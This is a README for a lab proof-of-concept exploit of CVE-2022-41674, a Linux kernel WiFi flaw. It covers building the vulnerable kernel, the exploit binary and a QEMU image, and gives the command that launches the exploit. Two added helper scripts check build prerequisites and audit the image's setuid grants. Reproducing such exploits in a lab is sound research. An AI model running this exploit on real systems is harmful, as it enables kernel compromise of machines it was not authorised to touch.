CVE-2022-41674
An extension of the beacown research.

Complete proof-of-concept exploit for CVE-2022-41674 targeting the Linux kernel v5.12-rc4 and v5.14.

To run the exploit against a target system, you will need to build:

  1. Linux kernel.
  2. Exploit binary.
  3. QEMU disk image.

The instructions below have been tested on a WSL2 Ubuntu 20.04 host system.

Building a target Linux kernel

Install system dependencies on a host system that will compile the kernel:

# apt install libelf-dev libssl-dev -y

From the repository root, clone the Linux kernel at the target tag, copy in the provided .config and build it:

$ git clone --branch v5.12-rc4 git://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git
$ cp .config linux
$ cd linux
$ make -j `nproc`

Building the exploit binary

Install the system dependencies needed to compile xpl.c:

# apt install libnl-3-200
# apt install libnl-genl-3-dev

xpl.c requires libpcap 1.10.1 or newer, so libpcap is built from source:

$ git clone https://github.com/the-tcpdump-group/libpcap.git
$ cd libpcap
$ git checkout libpcap-1.10.1
$ ./configure
$ make
# make install

Copy the libpcap library to the system library load path:

# cp ./libpcap.so.1.10.1 /usr/lib/x86_64-linux-gnu/ && ln -s /usr/lib/x86_64-linux-gnu/libpcap.so.1.10.1 /usr/lib/x86_64-linux-gnu/libpcap.so.1

Compile the xpl binary file:

$ gcc -o xpl xpl.c $(pkg-config --cflags --libs libnl-3.0 libnl-genl-3.0 libpcap)

Building the QEMU disk image

A modified version of the syzkaller ./create-image.sh script prepares the target system and copies the xpl binary and its associated poc.pcap files into the image.

Run ./create-image.sh with sudo; it produces stretch.img, which is the disk image that ./run.sh boots.

Running the target system

The target kernel and system can be run using the ./run.sh script.

Ensure that the path to the compiled kernel bzImage in ./run.sh matches the location of your local build.

The kernel must be built with CONFIG_MAC80211_HWSIM enabled.
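The two prerequisites that most often go wrong are the CONFIG_MAC80211_HWSIM option in the kernel .config and the libpcap minimum version from the exploit-build section. The following script is an added example and is not part of this repository: it checks a given .config for the option, compares the libpcap version that pkg-config reports against 1.10.1, and confirms that gcc, pkg-config and the libnl modules used by the compile command are present. It assumes the kernel tree's .config is passed as the first argument, that libpcap's pkg-config file is on PKG_CONFIG_PATH after make install, and that version strings are purely numeric.

```shell
#!/bin/sh
# Added example (not part of this repository): sanity checks for the build
# prerequisites listed in the README, meant to be run before create-image.sh.
# Assumptions: the kernel .config path is given as $1, libpcap is visible to
# pkg-config, and version strings contain only numeric dotted fields.

# kconfig_has FILE OPTION -> 0 if OPTION is built in (=y) or a module (=m)
kconfig_has() {
    grep -Eq '^'"$2"'=(y|m)$' "$1"
}

# version_ge A B -> 0 if dotted version A is >= B (compares up to 3 fields,
# missing fields count as 0, so "1.10" < "1.10.1")
version_ge() {
    _a=$1; _b=$2
    _oldifs=$IFS; IFS=.
    set -- $_a; _a1=${1:-0}; _a2=${2:-0}; _a3=${3:-0}
    set -- $_b; _b1=${1:-0}; _b2=${2:-0}; _b3=${3:-0}
    IFS=$_oldifs
    for _pair in "$_a1:$_b1" "$_a2:$_b2" "$_a3:$_b3"; do
        _x=${_pair%%:*}; _y=${_pair#*:}
        if [ "$_x" -gt "$_y" ]; then return 0; fi
        if [ "$_x" -lt "$_y" ]; then return 1; fi
    done
    return 0
}

# libpcap_ok -> 0 if pkg-config reports libpcap >= 1.10.1 (the README minimum)
libpcap_ok() {
    _v=$(pkg-config --modversion libpcap 2>/dev/null) || return 1
    version_ge "$_v" 1.10.1
}

# check_prereqs CONFIG -> prints one line per check; returns 0 only if all pass
check_prereqs() {
    _cfg=$1; _fail=0
    # Only the option the README names; add more to this list if needed.
    for _opt in CONFIG_MAC80211_HWSIM; do
        if kconfig_has "$_cfg" "$_opt"; then
            echo "ok    $_opt"
        else
            echo "FAIL  $_opt is not set to y or m in $_cfg"; _fail=1
        fi
    done
    for _tool in gcc pkg-config; do
        if command -v "$_tool" >/dev/null 2>&1; then
            echo "ok    $_tool found"
        else
            echo "FAIL  $_tool missing"; _fail=1
        fi
    done
    # The modules named in the README's gcc/pkg-config compile command.
    for _mod in libnl-3.0 libnl-genl-3.0; do
        if pkg-config --exists "$_mod" 2>/dev/null; then
            echo "ok    $_mod"
        else
            echo "FAIL  $_mod not found by pkg-config"; _fail=1
        fi
    done
    if libpcap_ok; then
        echo "ok    libpcap $(pkg-config --modversion libpcap)"
    else
        echo "FAIL  libpcap missing or older than 1.10.1"; _fail=1
    fi
    return $_fail
}

# Usage: sh check_prereqs.sh /path/to/linux/.config
if [ "$#" -ge 1 ]; then
    check_prereqs "$1"
fi
```

The script exits non-zero when any check fails, so it can gate a build script; a failing libpcap line after make install usually means /usr/local/lib/pkgconfig is not on PKG_CONFIG_PATH.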

Running the exploit

The exploit requires CAP_NET_ADMIN. ./create-image.sh grants this artificially: /sbin/iw is made root SUID and /xpl is given the capability with setcap.

$ /sbin/iw wlan0 scan trigger && /xpl /poc.pcap /poc2.pcap
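Because create-image.sh deliberately weakens the lab image (a root-SUID iw and a file capability on xpl), it is worth enumerating exactly what the image carries before it is reused for anything else. The following audit helpers are an added example, not part of this repository: given the mount point of the image, they list every setuid file and, where the getcap tool from libcap is installed, every file capability, and return non-zero if either is present. They assume the image has been mounted (for instance via a loop device) at the path passed as ROOT.

```shell
#!/bin/sh
# Added example (not part of this repository): audit helpers for the lab
# image produced by create-image.sh. Assumption: the image's root filesystem
# is mounted at the directory passed as ROOT.

# list_suid ROOT -> one path per line: regular files with the setuid bit set
list_suid() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null | sort
}

# count_suid ROOT -> number of setuid files under ROOT
count_suid() {
    list_suid "$1" | wc -l | tr -d ' '
}

# audit_image ROOT -> prints a report; returns 1 if any setuid file or file
# capability is found, 0 if the tree carries neither
audit_image() {
    _root=$1
    _n=$(count_suid "$_root")
    _caps=""
    echo "setuid files under $_root: $_n"
    list_suid "$_root" | sed 's/^/  /'
    # getcap -r walks the tree and prints "path cap_xxx=ep" for each file
    # that carries a capability (this is how /xpl is granted CAP_NET_ADMIN).
    if command -v getcap >/dev/null 2>&1; then
        _caps=$(getcap -r "$_root" 2>/dev/null)
        echo "file capabilities:"
        printf '%s\n' "$_caps" | sed '/^$/d; s/^/  /'
    else
        echo "file capabilities: getcap not installed, skipped"
    fi
    if [ "$_n" -gt 0 ] || [ -n "$_caps" ]; then
        return 1
    fi
    return 0
}

# Usage: sh audit_image.sh /mnt/stretch
if [ "$#" -ge 1 ]; then
    audit_image "$1"
fi
```

Run against the mounted stretch.img, the report should show exactly the two grants the README describes (sbin/iw as setuid, xpl with a capability); anything else listed is an unexpected addition to the image.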
